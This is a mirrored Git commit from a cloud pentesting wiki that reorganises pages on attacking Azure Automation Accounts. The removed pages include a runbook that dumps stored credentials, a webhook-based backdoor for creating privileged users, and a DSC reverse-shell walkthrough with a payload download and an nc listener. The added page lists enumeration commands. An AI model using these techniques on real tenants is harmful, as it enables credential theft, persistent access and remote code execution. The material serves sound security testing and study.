gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-04 16:57:26 -08:00
Code Issues Packages Projects Releases Wiki Activity

fix ec2 + automation accounts

Browse Source
This commit is contained in:
Carlos Polop
2025-01-10 12:59:11 +01:00
parent 6d926a6f72
commit d9f6b34673
7 changed files with 513 additions and 258 deletions
Download Patch File Download Diff File Expand all files Collapse all files

181
src/pentesting-cloud/azure-security/az-services/az-automation-account/README.md
View File

@@ -1,181 +0,0 @@
# Az - Automation Account
{{#include ../../../../banners/hacktricks-training.md}}
## Basic Information
[From the docs:](https://learn.microsoft.com/en-us/azure/automation/overview) Azure Automation delivers a cloud-based automation, operating system updates, and configuration service that supports consistent management across your Azure and non-Azure environments. It includes process automation, configuration management, update management, shared capabilities, and heterogeneous features.
These are like "**scheduled tasks**" in Azure that will let you execute things (actions or even scripts) to **manage**, check and configure the **Azure environment**.
### Run As Account
When **Run as Account** is used, it creates an Azure AD **application** with self-signed certificate, creates a **service principal** and assigns the **Contributor** role for the account in the **current subscription** (a lot of privileges).\
Microsoft recommends using a **Managed Identity** for Automation Account.
> [!WARNING]
> This will be **removed on September 30, 2023 and changed for Managed Identities.**
## Runbooks & Jobs
**Runbooks** allow you to **execute arbitrary PowerShell** code. This could be **abused by an attacker** to steal the permissions of the **attached principal** (if any).\
In the **code** of **Runbooks** you could also find **sensitive info** (such as creds).
If you can **read** the **jobs**, do it as they **contain** the **output** of the run (potential **sensitive info**).
Go to `Automation Accounts` --> `<Select Automation Account>` --> `Runbooks/Jobs/Hybrid worker groups/Watcher tasks/credentials/variables/certificates/connections`
### Hybrid Worker
A Runbook can be run in a **container inside Azure** or in a **Hybrid Worker** (non-azure machine).\
The **Log Analytics Agent** is deployed on the VM to register it as a hybrid worker.\
The hybrid worker jobs run as **SYSTEM** on Windows and **nxautomation** account on Linux.\
Each Hybrid Worker is registered in a **Hybrid Worker Group**.
Therefore, if you can choose to run a **Runbook** in a **Windows Hybrid Worker**, you will execute **arbitrary commands** inside an external machine as **System** (nice pivot technique).
## Compromise State Configuration (SC)
[From the docs:](https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview) Azure Automation **State Configuration** is an Azure configuration management service that allows you to write, manage, and compile PowerShell Desired State Configuration (DSC) [configurations](https://learn.microsoft.com/en-us/powershell/dsc/configurations/configurations) for nodes in any cloud or on-premises datacenter. The service also imports [DSC Resources](https://learn.microsoft.com/en-us/powershell/dsc/resources/resources), and assigns configurations to target nodes, all in the cloud. You can access Azure Automation State Configuration in the Azure portal by selecting **State configuration (DSC)** under **Configuration Management**.
**Sensitive information** could be found in these configurations.
### RCE
It's possible to abuse SC to run arbitrary scripts in the managed machines.
{{#ref}}
az-state-configuration-rce.md
{{#endref}}
## Enumeration
```powershell
# Check user right for automation
az extension add --upgrade -n automation
az automation account list # if it doesn't return anything the user is not a part of an Automation group
# Gets Azure Automation accounts in a resource group
Get-AzAutomationAccount
# List & get DSC configs
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration | where {$_.name -match '<name>'} | Export-AzAutomationDscConfiguration -OutputFolder . -Debug
## Automation Accounts named SecurityBaselineConfigurationWS... are there by default (not interesting)
# List & get Run books code
Get-AzAutomationAccount | Get-AzAutomationRunbook
Get-AzAutomationAccount | Get-AzAutomationRunbook | Export-AzAutomationRunbook -OutputFolder /tmp
# List credentials & variables & others
Get-AzAutomationAccount | Get-AzAutomationCredential
Get-AzAutomationAccount | Get-AzAutomationVariable
Get-AzAutomationAccount | Get-AzAutomationConnection
Get-AzAutomationAccount | Get-AzAutomationCertificate
Get-AzAutomationAccount | Get-AzAutomationSchedule
Get-AzAutomationAccount | Get-AzAutomationModule
Get-AzAutomationAccount | Get-AzAutomationPython3Package
## Exfiltrate credentials & variables and the other info loading them in a Runbook and printing them
# List hybrid workers
Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME>
```
### Create a Runbook
```powershell
# Get the role of a user on the Automation account
# Contributor or higher = Can create and execute Runbooks
Get-AzRoleAssignment -Scope /subscriptions/<ID>/resourceGroups/<RG-NAME>/providers/Microsoft.Automation/automationAccounts/<AUTOMATION-ACCOUNT>
# Create a Powershell Runbook
Import-AzAutomationRunbook -Name <RUNBOOK-NAME> -Path C:\Tools\username.ps1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Type PowerShell -Force -Verbose
# Publish the Runbook
Publish-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose
# Start the Runbook
Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose
```
### Exfiltrate Creds & Variables defined in an Automation Account using a Run Book
```powershell
# Change the crdentials & variables names and add as many as you need
@'
$creds = Get-AutomationPSCredential -Name <credentials_name>
$runbook_variable = Get-AutomationVariable -name <variable_name>
$runbook_variable
$creds.GetNetworkCredential().username
$creds.GetNetworkCredential().password
'@ | out-file -encoding ascii 'runbook_get_creds.ps1'
$ResourceGroupName = '<resource_group_name>'
$AutomationAccountName = '<auto_acc_name>'
$RunBookName = 'Exif-Credentials' #Change this for stealthness
# Creare Run book, publish, start, and get output
New-AzAutomationRunBook -name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Type PowerShell
Import-AzAutomationRunBook -Path 'runbook_get_creds.ps1' -Name $RunBookName -Type PowerShell -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Force
Publish-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
$start = Start-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
start-sleep 20
($start | Get-AzAutomationJob | Get-AzAutomationJobOutput).Summarynt
```
> [!NOTE]
> You could do the same thing modifying an existing Run Book, and from the web console.
### Steps for Setting Up an Automated Highly Privileged User Creation
#### 1. Initialize an Automation Account
- **Action Required:** Create a new Automation Account.
- **Specific Setting:** Ensure "Create Azure Run As account" is enabled.
#### 2. Import and Set Up Runbook
- **Source:** Download the sample runbook from [MicroBurst GitHub Repository](https://github.com/NetSPI/MicroBurst).
- **Actions Required:**
- Import the runbook into the Automation Account.
- Publish the runbook to make it executable.
- Attach a webhook to the runbook, enabling external triggers.
#### 3. Configure AzureAD Module
- **Action Required:** Add the AzureAD module to the Automation Account.
- **Additional Step:** Ensure all Azure Automation Modules are updated to their latest versions.
#### 4. Permission Assignment
- **Roles to Assign:**
- User Administrator
- Subscription Owner
- **Target:** Assign these roles to the Automation Account for necessary privileges.
#### 5. Awareness of Potential Access Loss
- **Note:** Be aware that configuring such automation might lead to losing control over the subscription.
#### 6. Trigger User Creation
- Trigger the webhook to create a new user by sending a POST request.
- Use the PowerShell script provided, ensuring to replace the `$uri` with your actual webhook URL and updating the `$AccountInfo` with the desired username and password.
```powershell
$uri = "<YOUR_WEBHOOK_URL>"
$AccountInfo = @(@{RequestBody=@{Username="<DESIRED_USERNAME>";Password="<DESIRED_PASSWORD>"}})
$body = ConvertTo-Json -InputObject $AccountInfo
$response = Invoke-WebRequest -Method Post -Uri $uri -Body $body
```
## References
- [https://learn.microsoft.com/en-us/azure/automation/overview](https://learn.microsoft.com/en-us/azure/automation/overview)
- [https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview](https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview)
- [https://github.com/rootsecdev/Azure-Red-Team#runbook-automation](https://github.com/rootsecdev/Azure-Red-Team#runbook-automation)
{{#include ../../../../banners/hacktricks-training.md}}

68
src/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md
View File

@@ -1,68 +0,0 @@
# Az - State Configuration RCE
{{#include ../../../../banners/hacktricks-training.md}}
**Check the complete post in:** [**https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe**](https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe)
### Summary of Remote Server (C2) Infrastructure Preparation and Steps
#### Overview
The process involves setting up a remote server infrastructure to host a modified Nishang `Invoke-PowerShellTcp.ps1` payload, named `RevPS.ps1`, designed to bypass Windows Defender. The payload is served from a Kali Linux machine with IP `40.84.7.74` using a simple Python HTTP server. The operation is executed through several steps:
#### Step 1 — Create Files
- **Files Required:** Two PowerShell scripts are needed:
1. `reverse_shell_config.ps1`: A Desired State Configuration (DSC) file that fetches and executes the payload. It is obtainable from [GitHub](https://github.com/nickpupp0/AzureDSCAbuse/blob/master/reverse_shell_config.ps1).
2. `push_reverse_shell_config.ps1`: A script to publish the configuration to the VM, available at [GitHub](https://github.com/nickpupp0/AzureDSCAbuse/blob/master/push_reverse_shell_config.ps1).
- **Customization:** Variables and parameters in these files must be tailored to the user's specific environment, including resource names, file paths, and server/payload identifiers.
#### Step 2 — Zip Configuration File
- The `reverse_shell_config.ps1` is compressed into a `.zip` file, making it ready for transfer to the Azure Storage Account.
```powershell
Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip
```
#### Step 3 — Set Storage Context & Upload
- The zipped configuration file is uploaded to a predefined Azure Storage container, azure-pentest, using Azure's Set-AzStorageBlobContent cmdlet.
```powershell
Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx
```
#### Step 4 — Prep Kali Box
- The Kali server downloads the RevPS.ps1 payload from a GitHub repository.
```bash
wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1
```
- The script is edited to specify the target Windows VM and port for the reverse shell.
#### Step 5 — Publish Configuration File
- The configuration file is executed, resulting in the reverse-shell script being deployed to the specified location on the Windows VM.
#### Step 6 — Host Payload and Setup Listener
- A Python SimpleHTTPServer is started to host the payload, along with a Netcat listener to capture incoming connections.
```bash
sudo python -m SimpleHTTPServer 80
sudo nc -nlvp 443
```
- The scheduled task executes the payload, achieving SYSTEM-level privileges.
#### Conclusion
The successful execution of this process opens numerous possibilities for further actions, such as credential dumping or expanding the attack to multiple VMs. The guide encourages continued learning and creativity in the realm of Azure Automation DSC.
{{#include ../../../../banners/hacktricks-training.md}}

234
src/pentesting-cloud/azure-security/az-services/az-automation-accounts.md Normal file
View File

@@ -0,0 +1,234 @@
# Az - Automation Accounts
{{#include ../../../../banners/hacktricks-training.md}}
## Basic Information
Azure Automation Accounts are cloud-based services in Microsoft Azure that help **automate tasks** like resource management, configuration, and updates across Azure and on-premises environments. They provide **Runbooks** (scripts for automation that are executed), **schedules**, and **hybrid worker groups** to run automation **jobs**, enabling infrastructure as code (IaC) and process automation for improved efficiency and consistency in managing cloud resources.
### Settings
- **Credentials**: The password is only accessible within a runbook inside the automation account, they are used to **store usernames and passwords securely**.
- **Variables**: Used to store **configuration data** that can be used in runbooks. This could also be sensitive information like API keys. If the variable is **stored encrypted**, it's only available within a runbook inside the automation account.
- **Certificates**: Used to store **certificates** that can be used in runbooks.
- **Connections**: Used to store **connection information** to external services. This could contain **sensitive information**.
- **Network Access**: It can be set to **public** or **private**.
## Runbooks & Jobs
A Runbook in Azure Automation is a **script that performs tasks automatically** within your cloud environment. Runbooks can be written in PowerShell, Python, or Graphical editors. They help automate administrative tasks like VM management, patching, or compliance checks.
In the **code** located inside **Runbooks** could contains **sensitive info** (such as creds).
Go to `Automation Accounts` --> `<Select Automation Account>` --> `Runbooks/Jobs/Hybrid worker groups/Watcher tasks/credentials/variables/certificates/connections`
A **Job is an instance of a Runbook execution**. When you run a Runbook, a Job is created to track that execution. Each job includes:
- **Status**: Queued, Running, Completed, Failed, Suspended.
- **Output**: The result of the Runbook execution.
- **Start and End Time**: When the job started and completed.
A job contains the **output** of the **Runbook** execution. If you can **read** the **jobs**, do it as they **contain** the **output** of the run (potential **sensitive info**).
### Schedules & Webhooks
There are 3 main ways to execute a Runbook:
- **Schedules**: These are used to **trigger** Runbooks at a **specific time** or **interval**.
- **Webhooks**: These are **HTTP endpoints** that can be used to **trigger** Runbooks from **external services**. Note that the webhook URL is **not visible** after creation.
- **Manual Trigger**: You can **manually trigger** a Runbook from the Azure Portal and from the cli.
### Source Control
It allows to import Runbooks from **Github, Azure Devops (Git) and Azure Devops (TFVC)**. It's possible to indicate it to publish the Runbooks of the repo to Azure Automation account and it's also possible to indicate to **sync the changes from the repo** to the Azure Automation account.
When the sync is enabled, in the **Github repository a webhook is created** to trigger the sync everytime a push event ocurs. Example of a webhook URL: `https://f931b47b-18c8-45a2-9d6d-0211545d8c02.webhook.eus.azure-automation.net/webhooks?token=DRjQyFiOrUtz%2fw7o23XbDpOlTe1%2bUqPQm4pQH2WBfJg%3d`
Note that these webhooks **won't be visible** when listing webhooks in the associated runbooks to the Github repo. Also note that it's **not possible to change the repo URL** of a source control once it's created.
In order for the configured source control to work, the **Azure Automation Account** needs to have a managed identity (system or user) with the **`Contributor`** role. Moreover, to assing a user managed identity to the Automation Account, it'spossible to do it just setting the variable **`AUTOMATION_SC_USER_ASSIGNED_IDENTITY_ID`** to the **User Managed Identity Client ID**.
### Runtime Environments
When creating a Runbook it'spossible to select the runtime environment. By default, the following runtime environments are available:
- **Powershell 5.1**
- **Powershell 7.1**
- **PowerShell 7.2**
- **Python 3.10**
- **Python 3.8**
- **Python 2.7**
However, it's also possible to **create your own environments**, using one of these as a base. In the case of python, it's possible to upload `.whl` packages to the environment that will be used. In the case of PowerShell, it's possible to upload `.zip` packages with the modules to have in the runtime.
### Hybrid Worker
A Runbook can be run in a **container inside Azure** or in a **Hybrid Worker** (non-azure machine).\
The **Log Analytics Agent** is deployed on the VM to register it as a hybrid worker.\
The hybrid worker jobs run as **SYSTEM** on Windows and **nxautomation** account on Linux.\
Each Hybrid Worker is registered in a **Hybrid Worker Group**.
Therefore, if you can choose to run a **Runbook** in a **Windows Hybrid Worker**, you will execute **arbitrary commands** inside an external machine as **System** (nice pivot technique).
### State Configuration (SC)
>[!WARNING]
> As indicated in [the docs](https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview), Azure Automation State Configuration will be retired on September 30, 2027 and replaced by [Azure Machine Configuration](https://learn.microsoft.com/en-us/azure/governance/machine-configuration/overview).
Automation Accounts also support **State Configuration (SC)**, which is a feature that helps **configure** and **maintain** the **state** of your VMs. It's possible to **create** and **apply** DSC configurations to **Windows** and **Linux** machines.
From an attackers perspective this was interesting because it allowed to **execute arbitrary PS code in all the configured VMs** allowing to escalate privileges to the managed identities of these VMs, potentially pivoting to new networks... Also, the configurations could contain **sensitive info**.
## Enumeration
```bash
# List Automation Accounts
az automation account list --output table
# Get Automation Account details
# Check the network access in `privateEndpointConnections` and `publicNetworkAccess`
# Check the managed identities in `identity`
az automation account show --name <AUTOMATION-ACCOUNT> --resource-group <RG-NAME>
# Get keys of automation account
## These are used for the DSC
az automation account list-keys --automation-account-name <AUTOMATION-ACCOUNT> --resource-group <RG-NAME>
# Get schedules of automation account
az automation schedule list --automation-account-name <AUTOMATION-ACCOUNT> --resource-group <RG-NAME>
# Get connections of automation account
az rest --method GET \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/connections?api-version=2023-11-01"
# Get connection details
az rest --method GET \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/connections/<connection-name>?api-version=2023-11-01"
# Get credentials of automation account
az rest --method GET \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/credentials?api-version=2023-11-01"
# Get credential details
## Note that you will only be able to access the password from inside a Runbook
az rest --method GET \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/credentials/<credential-name>?api-version=2023-11-01"
# Get certificates of automation account
az rest --method GET \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/certificates?api-version=2023-11-01"
# Get certificate details
az rest --method GET \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/certificates/<certificate-name>?api-version=2023-11-01"
# Get variables of automation account
## It's possible to get the value of unencrypted variables but not the encrypted ones
az rest --method GET \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/variables?api-version=2023-11-01"
# Get variable details
az rest --method GET \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/variables/<variable-name>?api-version=2023-11-01"
# Get runbooks of an automation account
az automation runbook list --automation-account-name <AUTOMATION-ACCOUNT> --resource-group <RG-NAME>
# Get runbook details
az automation runbook show --automation-account-name <AUTOMATION-ACCOUNT> --resource-group <RG-NAME> --name <RUNBOOK-NAME>
# Get runbook content
az rest --method GET \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/runbooks/<runbook-name>/content?api-version=2023-11-01"
# Get jobs of an automation account
az automation job list --automation-account-name <AUTOMATION-ACCOUNT> --resource-group <RG-NAME>
# Get job details
az automation job show --automation-account-name <AUTOMATION-ACCOUNT> --resource-group <RG-NAME> --name <JOB-NAME>
# Get job output
az rest --method GET \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/jobs/<job-name>/output?api-version=2023-11-01"
# Get the Runbook content when the job was executed
az rest --method GET \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/jobs/<job-name>/runbookContent?api-version=2023-11-01"
# Get webhooks inside an automation account
## It's possible to see to which runbook it belongs in the given data
## For security reasons it's not possible to see the URL of the webhook after creating it, here is a URL example: https://f931b47b-18c8-45a2-9d6d-0211545d8c02.webhook.eus.azure-automation.net/webhooks?token=dOdnxk6z7ugAxiuyUMKgPuDMav2Jw5EJediMdiN4jLo%3d
## Generating a webhook can be useful from a persistence perspective
az rest --method GET \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/webhooks?api-version=2018-06-30"
# Get the source control setting of an automation account (if any)
## inside the output it's possible to see if the autoSync is enabled, if the publishRunbook is enabled and the repo URL
aaz automation source-control list --automation-account-name <AUTOMATION-ACCOUNT> --resource-group <RG-NAME>
# Get custom runtime environments
## Check in defaultPackages for custom ones, by default Python envs won't have anything here and PS1 envs will have "az" and "azure cli"
az automation runtime-environment list \
--resource-group <res-group>> \
--automation-account-name <account-name> \
--query "[?!(starts_with(description, 'System-generated'))]"
# Get State Configurations (SC) of an automation account
az automation dsc configuration list --automation-account-name <AUTOMATION-ACCOUNT> --resource-group <RG-NAME>
# Get State Configuration details
az automation dsc configuration show --automation-account-name <AUTOMATION-ACCOUNT> --resource-group <RG-NAME> --name <DSC-CONFIG-NAME>
# Get State Configuration content
az automation dsc configuration show-content --automation-account-name <AUTOMATION-ACCOUNT> --resource-group <RG-NAME> --name <DSC-CONFIG-NAME>
```
```powershell
# Check user right for automation
az extension add --upgrade -n automation
az automation account list # if it doesn't return anything the user is not a part of an Automation group
# Gets Azure Automation accounts in a resource group
Get-AzAutomationAccount
# List & get DSC configs
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration | where {$_.name -match '<name>'} | Export-AzAutomationDscConfiguration -OutputFolder . -Debug
## Automation Accounts named SecurityBaselineConfigurationWS... are there by default (not interesting)
# List & get Run books code
Get-AzAutomationAccount | Get-AzAutomationRunbook
Get-AzAutomationAccount | Get-AzAutomationRunbook | Export-AzAutomationRunbook -OutputFolder /tmp
# List credentials & variables & others
Get-AzAutomationAccount | Get-AzAutomationCredential
Get-AzAutomationAccount | Get-AzAutomationVariable
Get-AzAutomationAccount | Get-AzAutomationConnection
Get-AzAutomationAccount | Get-AzAutomationCertificate
Get-AzAutomationAccount | Get-AzAutomationSchedule
Get-AzAutomationAccount | Get-AzAutomationModule
Get-AzAutomationAccount | Get-AzAutomationPython3Package
## Exfiltrate credentials & variables and the other info loading them in a Runbook and printing them
# List hybrid workers
Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME>
```
## Privilege Escalation & Post Exploitation
{{#ref}}
../az-privilege-escalation/az-automation-accounts-privesc.md
{{#endref}}
## References
- [https://learn.microsoft.com/en-us/azure/automation/overview](https://learn.microsoft.com/en-us/azure/automation/overview)
- [https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview](https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview)
- [https://github.com/rootsecdev/Azure-Red-Team#runbook-automation](https://github.com/rootsecdev/Azure-Red-Team#runbook-automation)
{{#include ../../../../banners/hacktricks-training.md}}

4
src/pentesting-cloud/azure-security/az-services/vms/README.md
View File

@@ -579,9 +579,9 @@ Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Na
<details>
<summary>DesiredConfigurationState (DSC)</summary>
<summary>DesiredStateConfiguration (DSC)</summary>
This is a **VM extensio**n that belongs to Microsoft that uses PowerShell DSC to manage the configuration of Azure Windows VMs. Therefore, it can be used to **execute arbitrary commands** in Windows VMs through this extension:
This is a **VM extension** that belongs to Microsoft that uses PowerShell DSC to manage the configuration of Azure Windows VMs. Therefore, it can be used to **execute arbitrary commands** in Windows VMs through this extension:
```powershell
# Content of revShell.ps1